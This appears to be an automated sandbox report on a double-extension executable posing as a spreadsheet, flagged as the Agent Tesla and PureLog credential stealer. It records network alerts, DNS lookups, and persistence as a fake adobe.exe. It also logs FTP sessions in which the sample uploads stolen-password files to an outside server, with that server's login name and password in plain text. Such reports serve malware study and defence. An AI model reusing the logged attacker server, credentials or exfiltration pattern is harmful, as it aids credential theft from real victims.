add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc6d59	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x58b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xce000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc42f4	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc4de4	0xc4e00	9d79fb91c4e9ad0b1dd8561b69a5be8e	False	0.9122594246031746	data	7.880091500507158	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc8000	0x58b0	0x5a00	5529da2d4770d6994ad8320ee8b5cf22	False	0.30668402777777776	data	5.330660277582464	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xce000	0xc	0x200	38e29ca0858fb07b913b2317f1829522	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc81f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.4920212765957447
RT_ICON	0xc8658	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	0.32704918032786884
RT_ICON	0xc8fe0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.2303001876172608
RT_ICON	0xca088	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.15995850622406638
RT_ICON	0xcc630	0xc1d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8742341180264431
RT_GROUP_ICON	0xcd250	0x4c	data	0.75
RT_VERSION	0xcd29c	0x428	data	0.4116541353383459
RT_MANIFEST	0xcd6c4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-23T15:05:21.347468+0200	TCP	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	49748	63434	192.168.2.4	213.189.52.181
2024-07-23T15:05:21.331691+0200	TCP	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	49748	63434	192.168.2.4	213.189.52.181
2024-07-23T15:04:59.113823+0200	TCP	2029927	ET MALWARE AgentTesla Exfil via FTP	49734	21	192.168.2.4	213.189.52.181
2024-07-23T15:05:20.765442+0200	TCP	2029927	ET MALWARE AgentTesla Exfil via FTP	49747	21	192.168.2.4	213.189.52.181
2024-07-23T15:04:59.688534+0200	TCP	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	49736	63043	192.168.2.4	213.189.52.181
2024-07-23T15:04:59.682766+0200	TCP	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	49736	63043	192.168.2.4	213.189.52.181

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 23, 2024 15:04:55.530328035 CEST	49732	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:04:55.530364990 CEST	443	49732	104.26.12.205	192.168.2.4
Jul 23, 2024 15:04:55.530428886 CEST	49732	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:04:55.543821096 CEST	49732	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:04:55.543833017 CEST	443	49732	104.26.12.205	192.168.2.4
Jul 23, 2024 15:04:56.032614946 CEST	443	49732	104.26.12.205	192.168.2.4
Jul 23, 2024 15:04:56.032715082 CEST	49732	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:04:56.037194014 CEST	49732	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:04:56.037203074 CEST	443	49732	104.26.12.205	192.168.2.4
Jul 23, 2024 15:04:56.037592888 CEST	443	49732	104.26.12.205	192.168.2.4
Jul 23, 2024 15:04:56.083497047 CEST	49732	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:04:56.087587118 CEST	49732	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:04:56.132503986 CEST	443	49732	104.26.12.205	192.168.2.4
Jul 23, 2024 15:04:56.213104963 CEST	443	49732	104.26.12.205	192.168.2.4
Jul 23, 2024 15:04:56.213273048 CEST	443	49732	104.26.12.205	192.168.2.4
Jul 23, 2024 15:04:56.213416100 CEST	49732	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:04:56.241009951 CEST	49732	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:04:57.194710016 CEST	49734	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:57.200380087 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:57.203509092 CEST	49734	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:57.831351995 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:57.831691980 CEST	49734	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:57.836802959 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:58.029808044 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:58.030071974 CEST	49734	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:58.034923077 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:58.308783054 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:58.308954954 CEST	49734	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:58.320347071 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:58.509210110 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:58.509377003 CEST	49734	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:58.515353918 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:58.709877014 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:58.710068941 CEST	49734	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:58.725223064 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:58.913053036 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:58.913338900 CEST	49734	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:58.920022011 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:59.108258009 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:59.108740091 CEST	49736	63043	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:59.113656044 CEST	63043	49736	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:59.113725901 CEST	49736	63043	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:59.113822937 CEST	49734	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:59.125436068 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:59.682493925 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:59.682765961 CEST	49736	63043	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:59.682765961 CEST	49736	63043	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:59.687810898 CEST	63043	49736	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:59.688446045 CEST	63043	49736	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:59.688534021 CEST	49736	63043	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:59.724085093 CEST	49734	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:04:59.877233982 CEST	21	49734	213.189.52.181	192.168.2.4
Jul 23, 2024 15:04:59.927411079 CEST	49734	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:09.623667955 CEST	49738	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:09.623733044 CEST	443	49738	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:09.623809099 CEST	49738	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:09.626526117 CEST	49738	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:09.626547098 CEST	443	49738	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:10.574337006 CEST	443	49738	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:10.574460983 CEST	49738	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:10.576040030 CEST	49738	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:10.576054096 CEST	443	49738	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:10.576308966 CEST	443	49738	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:10.628518105 CEST	49738	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:10.672501087 CEST	443	49738	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:10.736783981 CEST	443	49738	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:10.736845016 CEST	443	49738	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:10.736921072 CEST	49738	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:10.740000010 CEST	49738	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:11.201653004 CEST	49739	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:11.831398010 CEST	21	49739	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:11.831491947 CEST	49739	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:11.835849047 CEST	49739	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:11.843100071 CEST	21	49739	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:11.843146086 CEST	49739	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:17.553463936 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:17.553508043 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:17.553584099 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:17.556786060 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:17.556808949 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:18.051497936 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:18.051568031 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:18.072128057 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:18.072161913 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:18.072412014 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:18.130326986 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:18.208626032 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:18.252507925 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:18.327044010 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:18.327117920 CEST	443	49746	104.26.12.205	192.168.2.4
Jul 23, 2024 15:05:18.327332973 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:18.329912901 CEST	49746	443	192.168.2.4	104.26.12.205
Jul 23, 2024 15:05:18.899457932 CEST	49747	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:18.904476881 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:18.904540062 CEST	49747	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:19.509800911 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:19.510204077 CEST	49747	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:19.515167952 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:19.699445963 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:19.699590921 CEST	49747	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:19.704376936 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:19.975642920 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:19.975974083 CEST	49747	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:19.980865002 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:20.165285110 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:20.165409088 CEST	49747	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:20.170222998 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:20.354471922 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:20.354814053 CEST	49747	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:20.359586000 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:20.551489115 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:20.551718950 CEST	49747	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:20.556684017 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:20.746926069 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:20.747486115 CEST	49748	63434	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:20.765273094 CEST	63434	49748	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:20.765345097 CEST	49748	63434	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:20.765441895 CEST	49747	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:20.774183989 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:21.331039906 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:21.331691027 CEST	49748	63434	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:21.331736088 CEST	49748	63434	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:21.341914892 CEST	63434	49748	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:21.346076965 CEST	63434	49748	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:21.347467899 CEST	49748	63434	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:21.380374908 CEST	49747	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:05:21.530711889 CEST	21	49747	213.189.52.181	192.168.2.4
Jul 23, 2024 15:05:21.583507061 CEST	49747	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:06:25.330521107 CEST	49750	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:06:25.339253902 CEST	21	49750	213.189.52.181	192.168.2.4
Jul 23, 2024 15:06:25.339457989 CEST	49750	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:06:25.341583014 CEST	49750	21	192.168.2.4	213.189.52.181
Jul 23, 2024 15:06:25.357913971 CEST	21	49750	213.189.52.181	192.168.2.4
Jul 23, 2024 15:06:25.372231007 CEST	21	49750	213.189.52.181	192.168.2.4
Jul 23, 2024 15:06:25.372292042 CEST	49750	21	192.168.2.4	213.189.52.181

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 23, 2024 15:04:55.449186087 CEST	57637	53	192.168.2.4	1.1.1.1
Jul 23, 2024 15:04:55.485059023 CEST	53	57637	1.1.1.1	192.168.2.4
Jul 23, 2024 15:04:57.176047087 CEST	58436	53	192.168.2.4	1.1.1.1
Jul 23, 2024 15:04:57.190607071 CEST	53	58436	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 23, 2024 15:04:55.449186087 CEST	192.168.2.4	1.1.1.1	0xa244	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jul 23, 2024 15:04:57.176047087 CEST	192.168.2.4	1.1.1.1	0x9991	Standard query (0)	s4.serv00.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 23, 2024 15:04:55.485059023 CEST	1.1.1.1	192.168.2.4	0xa244	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Jul 23, 2024 15:04:55.485059023 CEST	1.1.1.1	192.168.2.4	0xa244	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Jul 23, 2024 15:04:55.485059023 CEST	1.1.1.1	192.168.2.4	0xa244	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Jul 23, 2024 15:04:57.190607071 CEST	1.1.1.1	192.168.2.4	0x9991	No error (0)	s4.serv00.com	213.189.52.181	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	104.26.12.205	443	2912	C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-23 13:04:56 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-07-23 13:04:56 UTC	211	IN	HTTP/1.1 200 OK Date: Tue, 23 Jul 2024 13:04:56 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8a7be10ed8b842fb-EWR
2024-07-23 13:04:56 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	104.26.12.205	443	5852	C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-23 13:05:10 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-07-23 13:05:10 UTC	211	IN	HTTP/1.1 200 OK Date: Tue, 23 Jul 2024 13:05:10 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8a7be169b9554346-EWR
2024-07-23 13:05:10 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49746	104.26.12.205	443	7500	C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-23 13:05:18 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-07-23 13:05:18 UTC	211	IN	HTTP/1.1 200 OK Date: Tue, 23 Jul 2024 13:05:18 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8a7be1992beb4234-EWR
2024-07-23 13:05:18 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 23, 2024 15:04:57.831351995 CEST	21	49734	213.189.52.181	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 15:04. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 15:04. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 15:04. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
Jul 23, 2024 15:04:57.831691980 CEST	49734	21	192.168.2.4	213.189.52.181	USER f2241_dol
Jul 23, 2024 15:04:58.029808044 CEST	21	49734	213.189.52.181	192.168.2.4	331 User f2241_dol OK. Password required
Jul 23, 2024 15:04:58.030071974 CEST	49734	21	192.168.2.4	213.189.52.181	PASS Doll900#@
Jul 23, 2024 15:04:58.308783054 CEST	21	49734	213.189.52.181	192.168.2.4	230 OK. Current restricted directory is /
Jul 23, 2024 15:04:58.509210110 CEST	21	49734	213.189.52.181	192.168.2.4	504 Unknown command
Jul 23, 2024 15:04:58.509377003 CEST	49734	21	192.168.2.4	213.189.52.181	PWD
Jul 23, 2024 15:04:58.709877014 CEST	21	49734	213.189.52.181	192.168.2.4	257 "/" is your current location
Jul 23, 2024 15:04:58.710068941 CEST	49734	21	192.168.2.4	213.189.52.181	TYPE I
Jul 23, 2024 15:04:58.913053036 CEST	21	49734	213.189.52.181	192.168.2.4	200 TYPE is now 8-bit binary
Jul 23, 2024 15:04:58.913338900 CEST	49734	21	192.168.2.4	213.189.52.181	PASV
Jul 23, 2024 15:04:59.108258009 CEST	21	49734	213.189.52.181	192.168.2.4	227 Entering Passive Mode (213,189,52,181,246,67)
Jul 23, 2024 15:04:59.113822937 CEST	49734	21	192.168.2.4	213.189.52.181	STOR PW_user-405464_2024_07_23_09_04_55.html
Jul 23, 2024 15:04:59.682493925 CEST	21	49734	213.189.52.181	192.168.2.4	150 Accepted data connection
Jul 23, 2024 15:04:59.877233982 CEST	21	49734	213.189.52.181	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.199 seconds (measured here), 1.70 Kbytes per second
Jul 23, 2024 15:05:19.509800911 CEST	21	49747	213.189.52.181	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 15:05. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 15:05. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 15:05. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
Jul 23, 2024 15:05:19.510204077 CEST	49747	21	192.168.2.4	213.189.52.181	USER f2241_dol
Jul 23, 2024 15:05:19.699445963 CEST	21	49747	213.189.52.181	192.168.2.4	331 User f2241_dol OK. Password required
Jul 23, 2024 15:05:19.699590921 CEST	49747	21	192.168.2.4	213.189.52.181	PASS Doll900#@
Jul 23, 2024 15:05:19.975642920 CEST	21	49747	213.189.52.181	192.168.2.4	230 OK. Current restricted directory is /
Jul 23, 2024 15:05:20.165285110 CEST	21	49747	213.189.52.181	192.168.2.4	504 Unknown command
Jul 23, 2024 15:05:20.165409088 CEST	49747	21	192.168.2.4	213.189.52.181	PWD
Jul 23, 2024 15:05:20.354471922 CEST	21	49747	213.189.52.181	192.168.2.4	257 "/" is your current location
Jul 23, 2024 15:05:20.354814053 CEST	49747	21	192.168.2.4	213.189.52.181	TYPE I
Jul 23, 2024 15:05:20.551489115 CEST	21	49747	213.189.52.181	192.168.2.4	200 TYPE is now 8-bit binary
Jul 23, 2024 15:05:20.551718950 CEST	49747	21	192.168.2.4	213.189.52.181	PASV
Jul 23, 2024 15:05:20.746926069 CEST	21	49747	213.189.52.181	192.168.2.4	227 Entering Passive Mode (213,189,52,181,247,202)
Jul 23, 2024 15:05:20.765441895 CEST	49747	21	192.168.2.4	213.189.52.181	STOR PW_user-405464_2024_07_23_09_05_17.html
Jul 23, 2024 15:05:21.331039906 CEST	21	49747	213.189.52.181	192.168.2.4	150 Accepted data connection
Jul 23, 2024 15:05:21.530711889 CEST	21	49747	213.189.52.181	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.201 seconds (measured here), 1.68 Kbytes per second

Target ID:	0
Start time:	09:04:51
Start date:	23/07/2024
Path:	C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe"
Imagebase:	0xf30000
File size:	830'464 bytes
MD5 hash:	7DC8BA9345DE935C7B90EA6C61F3464F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1671407520.000000000331F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1675216718.0000000008110000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:04:53
Start date:	23/07/2024
Path:	C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe"
Imagebase:	0x460000
File size:	830'464 bytes
MD5 hash:	7DC8BA9345DE935C7B90EA6C61F3464F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4116477558.000000000275C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4116477558.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4116477558.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	09:05:06
Start date:	23/07/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0x640000
File size:	830'464 bytes
MD5 hash:	7DC8BA9345DE935C7B90EA6C61F3464F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1813288032.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1813288032.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:05:08
Start date:	23/07/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0xd40000
File size:	830'464 bytes
MD5 hash:	7DC8BA9345DE935C7B90EA6C61F3464F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
